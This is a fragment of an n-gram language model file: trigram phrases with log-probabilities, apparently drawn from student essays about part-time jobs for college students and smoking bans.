-0.9080606 may want students
-1.2201871 is why students
-0.53456277 were 8,000 students
-0.84897876 how few students
-0.80512136 to current students
-0.6445662 to assist students
-0.6445662 jobs assist students
-0.82838184 <s> Otherwise students
-0.76528955 For busy students
-0.69515115 to unproductive students
-0.76528955 well off students
-0.69515115 , brings students
-0.53456277 show irresponsible students
-0.53456277 constantly pushing students
-0.53456277 for needy students
-0.53456277 could inspire students
-0.69515115 these spoiled students
-1.2606536 to not engage
-1.5565478 unable to engage
-0.96771485 adults to engage
-2.0359368 <s> They engage
-1.2129124 can often mean
-1.821997 can also mean
-0.9653157 implemented with considerable
-0.9702419 mean a considerable
-0.8883506 undoubtedly meet considerable
-2.0614648 that the amount
-0.96683127 restricts the amount
-0.77699226 a considerable amount
-0.5673022 a small amount
-1.0175442 a significant amount
-0.88773197 relatively large amount
-0.54140407 A budgeted amount
-2.4215481 the student additional
-1.858969 amount of additional
-1.6364591 taking on additional
-1.2475339 be an additional
-1.997152 will have additional
-0.81796503 either requires additional
-0.86343884 of additional stress
-2.3008554 <s> The stress
-0.77699226 will cause stress
-0.8632097 be added stress
-0.77699226 study causes stress
-0.7050885 debt creates stress
-0.44769293 spend it on
-1.2084172 doing it on
-1.5096954 to be on
-1.9933773 a job on
-1.9516675 part-time job on
-1.8406049 Firstly , on
-1.5753349 Thirdly , on
-1.7391676 First , on
-1.2323338 age , on
-1.9604131 are not on
-0.9561437 smoke and on
-0.9370751 smoke has on
-0.8504858 additional stress on
-0.9122792 focus less on
-1.891715 their time on
-0.55156016 and focus on
-0.45981702 to focus on
-0.16569094 should focus on
-0.55156016 today focus on
-0.69540316 focus effectively on
-2.0050051 to work on
-0.9406857 processes work on
-0.92788047 debt -LRB- on
-1.2338492 my money on
-1.3589731 and so on
-0.69540316 no guarantee on
-0.94910926 newspapers or on
-0.9297109 spend even on
-1.2357036 lives are on
-0.9427249 concentrate more on
-0.44103047 student taking on
-0.5101622 by taking on
-0.5101622 and taking on
-0.44103047 of taking on
-0.5101622 students taking on
-1.6633052 to spend on
-0.5347369 some strains on
-0.8493379 of effort on
-1.2420161 do something on
-1.1732373 only take on
-0.91692567 taking classes on
-1.3205315 extra-curricular activities on
-0.76558566 depends strongly on
-0.93225247 catch up on
-0.69540316 it depends on
-0.91920877 with going on
-0.9303192 strike out on
-0.4448707 probable impact on
-0.4448707 beneficial impact on
-0.51466846 negative impact on
-0.69540316 a determination on
-0.23189282 , based on
-0.23189282 not based on
-0.23189282 purely based on
-0.23189282 formula based on
-1.2261263 as possible on
-0.33900368 not relying on
-0.33900368 than relying on
-1.2355402 I worked on
-0.832567 think back on
-0.6019163 must concentrate on
-0.6019163 instead concentrate on
-0.5347369 active role on
-0.7674805 poor participation on
-0.6440402 detrimental effect on
-0.6440402 definite effect on
-0.4253446 student takes on
-1.1698723 to think on
-0.38874552 be focused on
-0.38874552 is focused on
-0.38874552 heavily focused on
-0.46527386 and moving on
-0.46527386 before moving on
-0.69540316 fully dependent on
-0.69540316 is completed on
-0.80544597 can build on
-0.832567 especially early on
-0.69540316 100 % on
-0.5347369 it cheaper on
-0.5347369 focus strictly on
-0.54552317 and concentration on
-0.54552317 are concentration on
-0.21704142 and rely on
-0.21704142 students rely on
-0.21704142 co-workers rely on
-0.21704142 be concentrating on
-0.21704142 not concentrating on
-0.21704142 and concentrating on
-0.69540316 negative influence on
-0.3140839 <s> Depending on
-0.5347369 first priority on
-0.5347369 of action on
-1.0260235 are invaluable on
-0.8700384 I spent on
-0.72540855 college spent on
-1.0280948 the public on
-0.80544597 facilities purely on
-0.5347369 <s> Or on
-0.76558566 large expense on
-0.5347369 of strain on
-0.50669473 the pressure on
-0.76558566 of difficulties on
-0.33900368 gain hands on
-0.33900368 obtain hands on
-0.3140839 <s> Based on
-0.80544597 social groups on
-0.5347369 , lounging on
-0.5347369 people depend on
-0.5347369 Dairy Queens on
-0.5347369 work influences on
-0.29487875 a ban on
-0.29487875 outright ban on
-0.19269252 total ban on
-0.34310788 smoking ban on
-0.33900368 no restrictions on
-0.33900368 partial restrictions on
-0.5347369 too severe on
-0.97076845 near the top
-1.3793689 job on top
-0.9476186 stress on top
-0.96873605 of that created
-1.7872409 time for studies
-2.5783114 of the studies
-2.4533331 to the studies
-2.0986485 field of studies
-1.2484394 by their studies
-1.0386922 in their studies
-1.0386922 to their studies
-0.8953338 from their studies
-0.4016756 on their studies
-1.107489 have their studies
-0.82638824 how their studies
-0.82638824 furthering their studies
-0.82638824 between their studies
-1.0184413 complete their studies
-0.82638824 leaving their studies
-0.82638824 finally their studies
-1.2053039 time from studies
-1.6279718 away from studies
-1.3880014 impact on studies
-1.2226253 concentration on studies
-0.6767232 one 's studies
-1.4858656 their academic studies
-1.3906288 on my studies
-0.91852945 balance my studies
-0.8431235 <s> University studies
-0.93225014 to our studies
-1.2155454 in his studies
-1.1770841 of his studies
-1.0451295 their daily studies
-1.0451295 my tertiary studies
-2.1346512 <s> I also
-1.9068631 , I also
-0.9181328 And I also
-1.5400887 but it also
-1.2586496 job can also
-0.55208135 studying can also
-1.104629 students can also
-1.1185868 jobs can also
-0.78548425 organization can also
-0.78548425 People can also
-0.78548425 professional can also
-0.78548425 Jobs can also
-1.6072395 working part-time also
-2.0680072 a job also
-1.9907866 part-time job also
-1.9478422 it is also
-1.5816346 job is also
-1.139704 there is also
-1.4995198 time is also
-0.88002706 There is also
-1.401721 what is also
-0.90330285 dinner is also
-1.5780042 that will also
-1.570092 students will also
-1.5324879 They will also
-0.9682255 freedom , also
-0.96531725 saving and also
-0.95302516 's also also
-2.7587998 part time also
-1.6052718 Part-time jobs also
-1.2369223 skills may also
-0.87574697 , but also
-0.7267842 -RRB- but also
-0.7267842 situations but also
-0.7267842 subjects but also
-0.93243873 there should also
-0.93243873 offers should also
-2.0375073 , they also
-1.2019582 It 's also
-0.92545724 minimized ; also
-1.2399253 Many people also
-1.9942325 <s> They also
-0.999271 they fre also
-0.93885475 , while also
-0.999271 you fll also
-0.88462186 experiences could also
-0.88462186 major could also
-0.9362927 it must also
-2.0570633 <s> It also
-0.9518883 let fs also
-1.1550802 job would also
-0.90912604 books would also
-1.664405 <s> Students also
-0.87248117 let us also
-1.8067875 also be increased
-2.2018576 should be increased
-1.2668694 enjoy a less
-1.6871892 this is less
-1.9577751 there is less
-0.45353436 less and less
-0.9640375 cautious and less
-1.9899893 lead to less
-0.9642519 system as less
-0.92066175 colleges focus less
-1.8803471 will have less
-0.94948256 could have less
-0.93638587 up doing less
-0.86209834 is usually less
-0.9434723 , much less
-0.86209834 fre far less
-1.7313014 to smoke less
-1.2289349 at this time
-1.9024174 be a time
-1.415397 is a time
-1.7427728 at a time
-1.7909808 , the time
-1.6133882 by the time
-1.813194 to the time
-1.6133882 have the time
-0.91687983 By the time
-1.168835 take the time
-1.168835 use the time
-1.4460218 all the time
-0.91687983 because the time
-1.3857548 up the time
-1.664255 Therefore , time
-1.60648 skills , time
-0.9446756 relationships , time
-1.60648 people , time
-1.8608327 Secondly , time
-0.9446756 knows , time
-0.7263254 amount of time
-0.9274055 management of time
-1.482695 lot of time
-1.4358401 development of time
-1.1878201 waste of time
-0.4450404 plenty of time
-0.9649071 down to time
-1.3848621 with their time
-1.202069 of their time
-1.0673114 spend their time
-1.0673114 when their time
-1.2076797 use their time
-1.2629896 managing their time
-0.85715467 divide their time
-0.4271561 waste their time
-0.85715467 Throughout their time
-1.3079138 of study time
-0.74787927 less study time
-0.74787927 available study time
-0.74787927 my study time
-0.74787927 reduces study time
-0.69894636 having ample time
-1.1661074 be on time
-1.1661074 work on time
-0.91535074 completed on time
-1.0011381 is less time
-1.0011381 have less time
-0.5886873 their available time
-0.5886873 little available time
-0.5886873 fs available time
-1.250819 not have time
-0.66695637 their extra time
-0.8409487 little extra time
-0.66695637 The extra time
-0.94489455 spend some time
-0.8100164 part - time
-2.0652587 , or time
-0.026906654 a part time
-0.13305442 the part time
-0.08908353 , part time
-0.13349763 and part time
-0.19653554 of part time
-0.23454951 their part time
-0.19653554 studying part time
-0.059694584 working part time
-0.19653554 students part time
-0.10459932 work part time
-0.049158163 have part time
-0.19653554 even part time
-0.19653554 through part time
-0.19653554 at part time
-0.19653554 doing part time
-0.19653554 get part time
-0.059694584 A part time
-0.19653554 these part time
-0.19653554 particular part time
-0.19653554 Working part time
-0.19653554 pointless part time
-0.19653554 usual part time
-0.19653554 had part time
-0.19653554 distracting part time
-0.19653554 Any part time
-0.93274385 have more time
-0.93274385 even more time
-1.0583068 spend more time
-0.76941514 take more time
-0.76941514 spending more time
-1.5231737 an important time
-1.3700869 most important time
-0.4249848 the same time
-0.6732492 the first time
-0.8419982 is enough time
-0.8419982 devoting enough time
-0.7025639 and spend time
-0.6367243 to spend time
-0.5695653 To spend time
-0.5695653 who spend time
-0.5695653 must spend time
-0.3289765 we spend time
-2.0404243 <s> This time
-0.9124983 in your time
-0.9246972 families take time
-1.2042683 student fs time
-0.72274303 there fs time
-1.02261 with no time
-1.1126119 have no time
-0.8679575 itself quite time
-1.5893728 to find time
-0.33778113 a full time
-0.27531403 many full time
-0.27531403 of full time
-0.27531403 working full time
-0.27531403 work full time
-0.27531403 college full time
-0.27531403 enter full time
-0.5477344 a limited time
-0.5477344 the limited time
-0.8100164 Training requires time
-0.35964552 any free time
-0.35964552 their free time
-1.1262286 to manage time
-0.7365116 so much time
-0.9483205 During my time
-0.8100164 relatively short time
-0.76408845 it takes time
-0.64693975 job takes time
-0.16304728 <s> Part time
-0.86930656 not waste time
-0.93323654 much easier time
-0.9305745 and his time
-0.5371813 and arranging time
-0.69894636 an excellent time
-0.8100164 of using time
-0.8100164 and over time
-0.5371813 a special time
-0.34019393 this transitional time
-0.34019393 a transitional time
-0.5371813 an opportune time
-0.5371813 the in-class time
-0.8335478 a reasonable time
-0.5371813 <s> His time
-2.040306 that is available
-2.5083115 in the available
-1.3669411 for any available
-1.5554733 all their available
-0.92646575 what little available
-1.7719812 of time available
-1.2314352 less time available
-2.1944628 time jobs available
-1.5159715 be more available
-1.960092 student fs available
-1.016487 <s> Jobs available
-1.6274112 has to accomplish
-1.6274112 available to accomplish
-0.9631001 task to accomplish
-0.4230254 several part-time jobs
-0.3380166 that part-time jobs
-0.4230254 having part-time jobs
-0.21204364 , part-time jobs
-0.4230254 not part-time jobs
-0.4230254 many part-time jobs
-0.647251 of part-time jobs
-0.4230254 to part-time jobs
-0.58056915 work part-time jobs
-0.4230254 only part-time jobs
-0.04567298 have part-time jobs
-0.4230254 And part-time jobs
-0.4230254 offer part-time jobs
-0.4230254 These part-time jobs
-0.4230254 do part-time jobs
-0.4230254 take part-time jobs
-0.4230254 getting part-time jobs
-0.4230254 so-called part-time jobs
-0.4230254 had part-time jobs
-0.4230254 seek part-time jobs
-0.4230254 lucrative part-time jobs
-0.89848715 formal full-time jobs
-1.2336599 in many jobs
-0.9393584 do any jobs
-1.923857 work in jobs
-1.7548519 out of jobs
-1.5345184 variety of jobs
-1.2144974 get their jobs
-1.2144974 let their jobs
-0.94184864 quit their jobs
-2.2131145 <s> The jobs
-0.90329415 - time jobs
-0.6703452 part time jobs
-1.4741269 full time jobs
-0.43337673 Part time jobs
-0.90059876 more available jobs
-0.88324165 graduates f jobs
-1.2228583 from such jobs
-1.2152987 In most jobs
-0.9626769 doing are jobs
-0.47601426 <s> Part-time jobs
-1.2350262 their part jobs
-1.5279676 their first jobs
-1.191155 or other jobs
-0.9492942 us what jobs
-0.9550109 , all jobs
-1.1627815 not real jobs
-1.8168966 to get jobs
-0.8835673 of graduate jobs
-0.84047526 mostly basic jobs
-0.53937554 <s> Student jobs
-0.53937554 <s> Real-world jobs
-0.77350855 in regular jobs
-0.53937554 of offering jobs
-0.53937554 in low-skilled jobs
-1.549265 jobs can leave
-1.9304194 having to leave
-1.2640615 -RRB- to leave
-2.0067403 when they leave
-1.4519306 when we leave
-0.9060078 until we leave
-0.9607135 remain with one
-1.4683585 opportunity for one
-1.3675767 responsible for one
-1.3675767 responsibility for one
-1.9906621 would be one
-0.96466875 such that one
-0.940976 not having one
-2.8411796 a part-time one
-0.95795685 success is one
-1.245182 careers is one
-1.4338578 On the one
-1.2505733 learning , one
-0.96073115 policy , one
-0.96073115 Regardless , one
-1.4305155 on in one
-1.2216929 responsibilities of one
-0.9456745 extent of one
-1.4766462 costs of one
-0.9456745 control of one
-1.324357 related to one
-0.96129936 university as one
-0.9614811 lounging on one
-1.7994852 is also one
-0.85804737 can leave one
-1.9145849 , if one
-0.85804737 still pursuing one
-1.4207442 through college one
-1.9140393 the money one
-0.91578025 fortunate : one
-0.8721498 exactly does one
-2.0950513 to do one
-0.92628896 , no one
-1.7582545 to make one
-1.3817657 job during one
-0.8402394 , during one
-0.9331399 environment where one
-1.1088277 is perhaps one
-0.9329765 obligatory things one
-0.53893584 further cloud one
-1.0101975 <s> Reason one
-0.53893584 can complement one
-0.53893584 which complements one
-0.53893584 have perfected one
-0.9707589 distracted , tired
-0.95348483 leave one tired
-0.9248446 remember being tired
-0.9533981 was so tired
-0.5414925 him physically tired
-1.9503177 , and thus
-0.54174346 your horizons thus
-1.5279951 some cases unable
-0.96997774 unwilling and unable
-0.9442717 and thus unable
-2.379855 they are unable
-2.018425 from the focus
-0.9663688 appreciates the focus
-1.2669928 classes and focus
-1.5630261 level of focus
-1.8756372 time to focus
-1.4628435 unable to focus
-1.7669954 important to focus
-1.9878324 able to focus
-1.7439849 need to focus
-1.6752743 difficult to focus
-0.9415644 urged to focus
-1.7257692 and their focus
-1.4412072 students should focus
-1.3295405 Students should focus
-0.8969556 sophomores should focus
-1.1172352 of today focus
-1.0762684 and colleges focus
-1.483938 as much focus
-1.5864539 to focus effectively
-0.86392206 prioritize tasks effectively
-0.962609 ft it ?
-2.6533897 part-time job ?
-1.4331658 interested in ?
-1.2411869 that experience ?
-1.9926083 for students ?
-2.4830782 college students ?
-2.093192 their studies ?
-1.2561349 no time ?
-1.2472788 make money ?
-1.2373891 academic skills ?
-1.8505819 college education ?
-1.7518777 real world ?
-0.5396396 is subjective ?
-0.7025187 fairly straightforward ?
-0.90522367 's lives ?
-1.7467488 in Japan ?
-0.87323976 <s> generally ?
-0.8735652 learning anything ?
-0.8151331 human resources ?
-0.8146354 preparatory stage ?
-0.5396396 and authorities ?
-0.5396396 local governments ?
-0.5396396 right competency ?
-0.7025187 and attitude ?
-1.000287 the weekends ?
-0.5396396 his bursary ?
-0.8146354 true here ?
-2.3040445 and the resulting
-2.3489137 in a lower
-2.0148659 to a lower
-0.96306306 those from lower
-2.463656 for the quality
-2.2951527 on the quality
-0.9442717 a lower quality
-1.775723 a good quality
-0.8635808 mean poor quality
-1.9019111 by the school
-2.5318186 of the school
-1.4313239 tuition , school
-0.9661274 summary , school
-1.2971802 well in school
-0.71915513 are in school
-1.1455139 better in school
-1.022514 while in school
-0.9036703 performance in school
-0.9036703 stay in school
-0.9036703 taught in school
-1.8847612 work and school
-1.6928618 home and school
-1.4355797 quality of school
-1.2937872 going to school
-1.8264908 from their school
-1.1402442 and from school
-0.900643 adapt from school
-1.1402442 escape from school
-0.96287733 % on school
-0.9477868 on only school
-1.0496387 way through school
-0.8461769 pass through school
-0.8495195 experience at school
-1.054991 time at school
-0.8495195 success at school
-0.8495195 obtain at school
-0.45315358 a high school
-0.3919559 in high school
-0.3919559 of high school
-0.3919559 from high school
-0.3919559 are high school
-0.3919559 tutoring high school
-1.2146262 job after school
-1.2146262 work after school
-1.0421301 working during school
-0.8414618 playing during school
-0.81513315 with balancing school
-0.6073832 that particular school
-0.6073832 any particular school
-0.87380946 likely quit school
-1.0951425 to afford school
-1.3506913 of his school
-0.5399039 a nursery school
-0.5399039 or cram school
-0.6412889 of attending school
-0.5501957 still attending school
-0.955337 If I work
-0.9392286 ready for work
-1.3570583 look for work
-0.9392286 looking for work
-1.2120013 they can work
-0.93715113 someone can work
-1.6467737 students that work
-0.9512776 opportunities that work
-1.5162096 provide a work
-0.9569547 require a work
-0.7955801 for part-time work
-0.6799969 that part-time work
-0.7955801 the part-time work
-0.82612497 , part-time work
-0.6707772 and part-time work
-0.43747243 of part-time work
-0.6707772 find part-time work
-0.6707772 much part-time work
-0.6707772 take-up part-time work
-1.6826359 college is work
-0.92808676 acquire valuable work
-1.6800096 is the work
-1.3295732 in the work
-1.7307553 and the work
-1.847193 of the work
-1.5672972 to the work
-1.3801256 as the work
-1.2962034 entering the work
-0.4420277 enter the work
-1.5283194 understand the work
-0.91495925 join the work
-1.4844716 course , work
-1.6705663 studies , work
-0.94796413 social , work
-1.2260262 responsibilities , work
-0.94796413 budgeting , work
-1.5244119 and not work
-1.7431947 should not work
-1.5595735 life and work
-0.94747984 go and work
-0.94747984 welcome and work
-1.1991622 life of work
-0.6166282 world of work
-1.5053513 kind of work
-0.93359584 attainment of work
-1.4369242 form of work
-1.3868617 having to work
-1.0683893 graduation to work
-1.2720686 has to work
-1.3587917 students to work
-1.1901555 have to work
-1.3955173 important to work
-1.3040968 able to work
-1.3868617 need to work
-0.8578187 all to work
-1.0683893 get to work
-1.4091799 how to work
-0.8578187 life to work
-1.1696537 used to work
-1.3424424 difficult to work
-1.3015486 learning to work
-1.2307827 start to work
-1.3424424 learn to work
-1.0683893 getting to work
-0.8578187 ready to work
-1.1696537 right to work
-1.2720686 had to work
-1.0683893 goes to work
-1.3015486 wish to work
-0.8578187 decides to work
-1.657735 of their work
-0.8056274 whether course work
-0.8056274 setting course work
-1.2771343 and gain work
-1.9403274 such as work
-1.2522401 if students work
-1.955375 part time work
-1.5482059 full time work
-1.447525 Part time work
-0.89881396 of school work
-0.89881396 balancing school work
-1.2138816 from such work
-1.3345143 and then work
-1.833572 they should work
-0.9390156 students only work
-0.95890325 's college work
-2.1202333 that they work
-0.798722 on extra work
-1.1435329 some extra work
-1.5301163 <s> To work
-0.95189255 eat or work
-1.0554148 <s> Part-time work
-1.1895304 for future work
-0.9246275 earned through work
-1.527358 students who work
-1.1330373 Students who work
-0.95331013 goal at work
-1.4135706 and doing work
-1.1496066 not real work
-0.8757322 to therefore work
-0.76766455 usually menial work
-0.69717115 find sufficient work
-0.769241 Having prior work
-1.1623018 students find work
-0.86534023 to either work
-0.53595734 a strong work
-0.93238914 Too much work
-0.30756125 that hard work
-0.51996696 and hard work
-0.51996696 of hard work
-0.51996696 demands hard work
-0.51996696 really hard work
-0.69717115 very definitely work
-0.991708 in America work
-0.86534023 Japan generally work
-0.43410924 these days work
-0.76766455 in gaining work
-0.53595734 subconscious processes work
-0.9755738 my class work
-0.79836 pure class work
-0.53595734 <s> Actual work
-0.76766455 office hierarchies work
-1.309947 other hand work
-0.92094755 around our work
-1.2153925 where we work
-1.0806706 or her work
-0.80902135 to respect work
-1.0014405 <s> Balancing work
-0.76766455 experiencing regular work
-0.53595734 do volunteer work
-0.53595734 <s> Basic work
-0.8311293 <s> Parents work
-0.53595734 a semi-regular work
-0.53595734 a firm work
-0.53595734 and potentially work
-2.1927767 time , being
-0.9210763 most by being
-0.9210763 ideas by being
-0.9484807 increase of being
-1.3817028 aspects of being
-1.574209 importance of being
-0.9484807 pain of being
-1.4238701 transition from being
-0.4464805 no reason being
-1.2593756 school work being
-1.5442222 or even being
-0.8868732 principle benefits being
-0.77623254 specific subject being
-0.86228335 to everything being
-0.70444465 only remember being
-0.92549914 work being produced
-0.9628949 appreciate it if
-0.96321124 might be if
-1.837999 is that if
-1.6815944 think that if
-0.9427243 feels that if
-0.92492276 for , if
-0.81680286 example , if
-0.95295614 Therefore , if
-1.6865948 money , if
-1.6832182 However , if
-1.7341313 Secondly , if
-0.92492276 Although , if
-0.92492276 head , if
-1.6492568 Finally , if
-0.92492276 soul , if
-1.4915131 smoke , if
-0.9619095 when and if
-0.9619095 adulthood and if
-2.0958757 their studies if
-0.93985224 alternatively -LRB- if
-0.5398157 be sought if
-1.680649 <s> And if
-0.5155304 , even if
-0.87416023 want even if
-1.2377375 even more if
-0.9394387 unfortunate because if
-0.9471176 have these if
-1.1716379 the customers if
-1.1138552 real value if
-0.81542623 to decide if
-0.9363719 , than if
-1.5096374 <s> But if
-0.8149672 help determine if
-1.1285179 need later if
-0.3413272 <s> Even if
-0.702775 be nice if
-0.5398157 be desirable if
-0.702775 student household if
-2.3826947 should be related
-1.5021174 a job related
-1.8919646 part-time job related
-2.0130117 time job related
-1.2607083 that is related
-2.024167 is not related
-1.5469656 time work related
-1.2609017 which are related
-1.6048023 at all related
-1.9579836 student fs related
-0.46973985 not directly related
-0.46973985 ones directly related
-1.3326561 of responsibility related
-1.3870095 a smoking related
-2.0997815 the students f
-0.8767667 university graduates f
-0.9461726 ereal world f
-0.54122734 various epeople-skills f
-0.84159017 the ereal f
-0.8441873 healthy mind f
-0.54122734 of etime f
-2.2536452 can be found
-0.87781 treasurer positions found
-1.2262006 financial reasons -LRB-
-2.0542834 be a -LRB-
-2.6533897 part-time job -LRB-
-1.3141868 their chosen -LRB-
-0.9624961 build on -LRB-
-1.2235075 his studies -LRB-
-1.4239174 extra time -LRB-
-1.255451 class work -LRB-
-0.7025187 be found -LRB-
-0.8605619 energy level -LRB-
-0.93248284 good enough -LRB-
-1.5934918 of all -LRB-
-0.7025187 their commitments -LRB-
-0.84142673 of debt -LRB-
-0.9175819 for income -LRB-
-0.9186588 his way -LRB-
-0.8838247 too great -LRB-
-0.8146354 with co-workers -LRB-
-1.000287 I wanted -LRB-
-0.8384254 a boss -LRB-
-0.7025187 or applied -LRB-
-0.5396396 <s> Reducing -LRB-
-1.4811245 on smoking -LRB-
-1.0853071 the rights -LRB-
-0.5396396 or alternatively -LRB-
-1.2597749 experience for such
-0.9620756 never be such
-0.9414313 but having such
-1.6386516 life is such
-1.6877334 skills , such
-1.5315328 activities , such
-0.9611286 habits , such
-0.9591733 need in such
-0.9591733 been in such
-0.96531725 meetings and such
-1.2008727 gain from such
-0.934523 Incomes from such
-0.96183467 and as such
-2.2664719 part-time jobs such
-0.9385984 found -LRB- such
-1.9521496 , but such
-1.2605617 <s> As such
-0.53928757 career oriented such
-0.92545724 education ; such
-0.952908 life more such
-1.1640117 , skills such
-0.91417307 workplace skills such
-1.7634108 to make such
-0.53928757 to counter such
-1.6094098 to find such
-1.8734413 to learn such
-1.0930812 not afford such
-1.1380172 early age such
-0.7020066 important virtues such
-0.77335775 outside activity such
-0.7020066 entertainment establishments such
-0.53928757 that obstructs such
-0.53928757 would behoove such
-0.53928757 already built such
-0.53928757 for implementing such
-0.96056587 oneself with an
-1.5133054 opportunity for an
-0.9561515 disparate for an
-1.67437 could be an
-1.8755177 would be an
-1.7523344 it is an
-1.4013275 , is an
-1.3562455 time is an
-1.3145041 college is an
-0.7846648 College is an
-1.0756786 major is an
-0.8622929 expenses is an
-0.8622929 tasks is an
-0.8622929 think is an
-0.8622929 academics is an
-1.2743666 smoke is an
-0.9649224 budget , an
-1.2587804 Third , an
-2.0509198 are not an
-1.9446026 job in an
-0.95861584 necessity in an
-1.8674282 , and an
-0.959968 goods and an
-1.2609986 right of an
-1.2570083 use to an
-0.9640207 child to an
-1.2734743 for example an
-0.9439728 he has an
-0.9578613 things from an
-1.2739633 such as an
-0.8175643 financially as an
-0.8175643 them as an
-0.8175643 force as an
-0.8175643 success as an
-0.8175643 serves as an
-0.8175643 nightclubs as an
-1.3580158 gives students an
-1.3580158 give students an
-1.4706643 allows students an
-0.9613544 public on an
-0.8114997 be such an
-0.9954881 in such an
-0.8114997 make such an
-0.9462808 might have an
-1.4787086 would have an
-0.91557795 as : an
-0.9615749 weekends are an
-0.88930345 money at an
-0.88930345 discipline at an
-0.88930345 interns at an
-1.03742 and take an
-0.8384886 easily take an
-1.5973917 give them an
-1.0281518 to provide an
-0.83260334 years provide an
-1.3805608 and get an
-0.938008 round out an
-0.83999056 is now an
-0.5388479 <s> Consider an
-1.0825324 to build an
-0.8368516 to play an
-0.88247085 can complete an
-1.2009081 to choose an
-0.83999056 sexual growth an
-0.8138162 into creating an
-0.5388479 one embraces an
-1.7514766 as an internship
-1.2385615 to this -RRB-
-0.9623233 banning it -RRB-
-0.93589675 -LRB- valuable -RRB-
-1.3157183 and less -RRB-
-0.8743072 resources ? -RRB-
-0.8743072 weekends ? -RRB-
-0.5394636 an internship -RRB-
-1.0953276 tuition fees -RRB-
-0.9352124 -LRB- future -RRB-
-0.91989565 smoke-filled environment -RRB-
-0.9321379 enlightened enough -RRB-
-0.92617565 , classes -RRB-
-0.9138811 scholastic responsibilities -RRB-
-0.54670525 , etc. -RRB-
-0.81430376 completing assignments -RRB-
-1.2258713 I did -RRB-
-0.81430376 support him -RRB-
-0.7944621 some ! -RRB-
-0.7944621 soon ! -RRB-
-0.7022626 same thing -RRB-
-0.5394636 : i -RRB-
-0.5394636 , ii -RRB-
-0.7022626 are 1 -RRB-
-0.77365947 , 2 -RRB-
-0.77365947 and 3 -RRB-
-0.5394636 themed questions -RRB-
-0.5394636 cases eliminating -RRB-
-0.5394636 the bills -RRB-
-0.5394636 such renovations -RRB-
-0.77365947 or choices -RRB-
-2.7031982 part-time job then
-1.8056265 job , then
-1.5651324 student , then
-1.1851361 graduation , then
-1.7557685 time , then
-1.4774184 school , then
-1.0052997 -RRB- , then
-1.3230798 society , then
-0.9259299 impact , then
-0.9259299 concern , then
-0.9259299 courses , then
-0.9259299 starving , then
-2.2911818 , and then
-1.4051882 working and then
-1.5163549 school and then
-1.9337413 to study then
-1.8076148 can also then
-2.003346 part-time jobs then
-1.9463176 time jobs then
-1.6937573 <s> And then
-1.6392108 and are then
-1.231248 I did then
-0.9230772 and was then
-0.54078573 more affordable then
-1.3910253 <s> Even then
-0.54078573 is taken-on then
-1.3170925 of this may
-0.8746164 Perhaps this may
-0.8746164 admit this may
-0.8957382 then it may
-1.3528384 but it may
-0.43724513 or it may
-0.8957382 while it may
-0.9649198 benefits that may
-1.270631 time job may
-0.94547987 research job may
-0.95902103 same student may
-1.2325654 that many may
-2.3660836 , and may
-1.2501162 customers and may
-1.0082891 work experience may
-1.1771919 This experience may
-1.6357043 , students may
-1.9718778 college students may
-0.8921814 which students may
-1.1256568 Some students may
-0.8921814 current students may
-0.8921814 off students may
-2.7555687 part time may
-2.1569738 time jobs may
-0.9624301 much work may
-1.9489073 , but may
-2.0927348 in college may
-1.234845 , they may
-1.5418081 money they may
-0.92974216 career they may
-1.921657 , or may
-0.9410018 may or may
-0.91392124 These skills may
-1.2937104 people skills may
-1.7693361 students who may
-0.90636873 this idea may
-0.7730562 and again may
-1.5806198 <s> They may
-2.0834317 <s> This may
-1.3933619 we do may
-0.9334794 consumerist society may
-0.91640687 The income may
-1.4559643 too much may
-0.91333777 The workplace may
-0.8373756 <s> We may
-1.4959438 a person may
-0.5391116 advertising agency may
-0.5391116 <s> She may
-0.8399475 These employees may
-2.0020587 may be worth
-0.5414925 be worth pursuing
-2.1818254 they have pursuing
-2.1698732 they are pursuing
-0.9552167 today are pursuing
-1.2822051 while still pursuing
-1.668955 rather than pursuing
-0.9642686 part job but
-1.2891911 job , but
-1.4329495 student , but
-0.89184326 to , but
-1.3665935 working , but
-1.1815981 students , but
-0.89184326 pursuing , but
-0.89184326 include , but
-0.43625653 themselves , but
-1.453311 life , but
-0.89184326 flow , but
-0.89184326 family , but
-0.89184326 attributes , but
-0.89184326 burden , but
-0.89184326 about , but
-0.89184326 subjects , but
-0.89184326 hard , but
-0.89184326 companies , but
-0.89184326 class , but
-1.1250782 argument , but
-0.96512383 short time but
-1.8723998 part-time work but
-2.0877457 to work but
-0.9455292 thing -RRB- but
-0.9601094 good at but
-0.5406974 present situations but
-0.77577734 academic subjects but
-0.8760164 from books but
-0.70405877 some dishes but
-0.77577734 so -- but
-1.0975178 to lose but
-0.5406974 a salary but
-0.8431235 personal choice but
-1.999989 , but otherwise
-1.2918593 that would otherwise
-1.4963984 they would otherwise
-1.9405696 , it should
-1.5041988 and it should
-1.1748718 So it should
-0.9546976 one that should
-1.3987713 life that should
-1.249496 of job should
-1.0934265 any student should
-1.5187707 college student should
-0.43139663 Every student should
-0.87306476 modern student should
-1.4326923 part-time employment should
-1.8945094 , and should
-1.9006867 to study should
-0.9443471 finished studying should
-1.2883005 the restaurant should
-1.8565471 , there should
-0.7535017 that students should
-0.9504454 , students should
-1.0993925 to students should
-0.973893 The students should
-0.8861778 college students should
-0.6593459 College students should
-0.973893 Japanese students should
-0.7972417 therefore students should
-0.41014045 feel students should
-0.973893 Some students should
-0.7972417 possible students should
-0.7972417 years students should
-1.1295161 young students should
-1.8477448 part-time work should
-1.4778132 time work should
-0.94494015 obstructs such should
-2.0841255 in college should
-1.3256472 , they should
-1.1772586 and they should
-1.2016256 as they should
-0.972792 then they should
-0.7965083 necessary they should
-1.2122362 so they should
-1.321388 when they should
-1.2624317 what they should
-0.7965083 least they should
-1.1631769 where they should
-1.9027817 young people should
-1.1360334 <s> They should
-1.2438866 <s> College should
-1.2188349 and therefore should
-1.6345229 <s> It should
-1.3399664 social activities should
-1.1684611 working life should
-1.4649819 college life should
-0.946898 the education should
-0.93629825 work offers should
-0.8710913 and universities should
-0.9967413 their courses should
-0.7774541 <s> Students should
-1.0086393 <s> Jobs should
-0.5384087 most sophomores should
-0.8811104 public companies should
-1.15295 that he should
-0.77455467 so we should
-0.5468234 believe we should
-0.77455467 think we should
-0.77455467 age we should
-0.5384087 No deviation should
-0.8359797 <s> Parents should
-0.77185225 extra-curricular activity should
-0.5384087 <s> Governments should
-0.8359797 that none should
-0.42735428 that smoking should
-0.87814236 believe smoking should
-0.8359797 <s> Smoking should
-0.77185225 smoking tobacco should
-0.94360805 experiences can only
-0.94360805 matter can only
-1.2876709 that the only
-0.96467716 rarely the only
-1.1217847 this will only
-1.3608661 jobs will only
-1.310736 college will only
-0.8899153 life will only
